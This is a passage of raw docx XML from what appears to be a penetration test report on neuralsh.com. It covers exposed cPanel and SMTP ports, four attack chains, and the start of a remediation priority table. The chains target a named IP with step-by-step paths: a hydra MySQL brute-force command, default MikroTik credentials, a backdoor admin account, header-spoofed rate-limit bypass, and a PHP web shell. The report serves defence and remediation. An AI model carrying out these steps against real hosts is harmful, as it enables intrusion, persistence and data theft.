    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ports 2078 and 2091 were not present in the June 6 baseline scan but appeared open in the June 10 follow-up scan, both returning HTTP 401 with WWW-Authenticate: Basic realm="Restricted Area". These are additional cPanel management service ports that represent further credential brute-force attack surface. Their appearance after the initial scan also suggests that infrastructure changes are being made without a security review process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Restrict ports 2078 and 2091 via firewall. Conduct a full port audit of 103.16.62.217 and close all ports without a documented business purpose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-019 · SMTP Port 25 Transitioned from Filtered to Open Low CVSS 3.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:25 | Tool: Nmap, nc (follow-up scan 10 June 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Port 25 was listed as filtered in the June 6 baseline scan and open in the June 10 follow-up, accepting TCP connections. The unexplained transition indicates that a firewall rule was modified between the two scans without a documented change. An open SMTP port enables direct mail relay testing, SMTP user enumeration, and potential spam relay abuse if the Exim configuration allows it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Investigate why the port 25 firewall rule was removed. If direct SMTP delivery is not required (Exim on port 587 handles submission), restore the firewall block on port 25.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.4 Attack Chain Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The 20 individual findings do not exist in isolation. The following attack chains map how findings combine into multi-step compromise paths, each representing a realistic scenario that could be executed by an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.1 Attack Chain 1 — Server Takeover via Admin Panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Starting point:  Any internet connection</w:t>
        <w:br/>
        <w:t>End result:      Full server root access — all hosted domains compromised</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. DNS MX lookup → mail.neuralsh.com → 103.16.62.217 (origin IP exposed)</w:t>
        <w:br/>
        <w:t>2. Nmap scan → Port 2087 open (WHM root panel)</w:t>
        <w:br/>
        <w:t>3. Navigate to https://103.16.62.217:2087</w:t>
        <w:br/>
        <w:t>4. Brute force WHM credentials OR trigger password reset via email compromise</w:t>
        <w:br/>
        <w:t>5. Login to WHM → Terminal → root shell access</w:t>
        <w:br/>
        <w:t>6. Read all .env files, database credentials, API keys across all hosted accounts</w:t>
        <w:br/>
        <w:t>7. Access MySQL directly with extracted credentials → full data theft</w:t>
        <w:br/>
        <w:br/>
        <w:t>Complexity: Medium | Likelihood: Medium | Severity: Maximum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.2 Attack Chain 2 — API Abuse via Rate Limit Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Starting point:  Any internet connection</w:t>
        <w:br/>
        <w:t>End result:      Unlimited API access, data enumeration, potential account takeover</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. Load neuralsh.com in browser → JavaScript bundle reveals /web/v1/init/token</w:t>
        <w:br/>
        <w:t>2. Send 50 requests with rotating X-Forwarded-For headers</w:t>
        <w:br/>
        <w:t>3. Collect 50 valid JWT tokens — 0 rate limit responses (100% bypass)</w:t>
        <w:br/>
        <w:t>4. Automate token refresh every 29 minutes → perpetual API access</w:t>
        <w:br/>
        <w:t>5. Enumerate /web/v1/text/search, /web/v1/image/search, /web/v1/category</w:t>
        <w:br/>
        <w:t>6. If JWT secret obtained via Chain 1 → forge token with type:admin</w:t>
        <w:br/>
        <w:br/>
        <w:t>Complexity: Low | Likelihood: High (fully demonstrated) | Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.3 Attack Chain 3 — Network Infrastructure Takeover via MikroTik</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Starting point:  Any internet connection</w:t>
        <w:br/>
        <w:t>End result:      Full network routing control — traffic interception possible</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. Nmap scan → Port 9001 open (MikroTik WebFig)</w:t>
        <w:br/>
        <w:t>2. Navigate to http://103.16.62.217:9001 in browser</w:t>
        <w:br/>
        <w:t>3. Attempt default credentials: admin / (blank)</w:t>
        <w:br/>
        <w:t>4. If successful → RouterOS Dashboard</w:t>
        <w:br/>
        <w:t>5. Tools → Packet Sniffer → capture all network traffic in plaintext</w:t>
        <w:br/>
        <w:t>6. IP → Routes → add malicious routing entries</w:t>
        <w:br/>
        <w:t>7. System → Users → create backdoor admin account (persistence)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Complexity: Low (if default creds active) | Likelihood: Medium-High | Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.4 Attack Chain 4 — MySQL Brute Force to Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Starting point:  Any internet connection</w:t>
        <w:br/>
        <w:t>End result:      Full database access, potential remote code execution</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. Nmap scan → Port 3306 open (MySQL 8.0.43)</w:t>
        <w:br/>
        <w:t>2. Collect username candidates from JS bundle, error messages, cPanel redirects</w:t>
        <w:br/>
        <w:t>3. Targeted brute force: hydra -L users.txt -P passwords.txt mysql://103.16.62.217</w:t>
        <w:br/>
        <w:t>4. Successful authentication → SHOW DATABASES → SELECT * FROM users</w:t>
        <w:br/>
        <w:t>5. Full data exfiltration: user records, search history, API credentials</w:t>
        <w:br/>
        <w:t>6. If FILE privilege granted → write PHP web shell to /var/www/html/ → RCE</w:t>
        <w:br/>
        <w:br/>
        <w:t>Complexity: Medium | Likelihood: Medium | Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.5 Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.5.1 Priority Matrix</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2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Required Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Time Estimate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P0 — Immediate**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-014 WHM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 2087 to trusted IPs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P0 — Immediate**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-013 cPanel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 2083 to trusted IPs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P0 — Immediate**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-001 MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 3306 to localhost only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P0 — Immediate**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-002 MikroTik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 9001, change default credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P1 — 24 hours**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-005 Rate Limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Replace X-Forwarded-For with CF-Connecting-IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P1 — 24 hours**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-015 Webmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall port 2096 to trusted IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P1 — 24 hours**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>N-018 cPanel ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall ports 2078, 2091</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**P1 — 24 hours**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
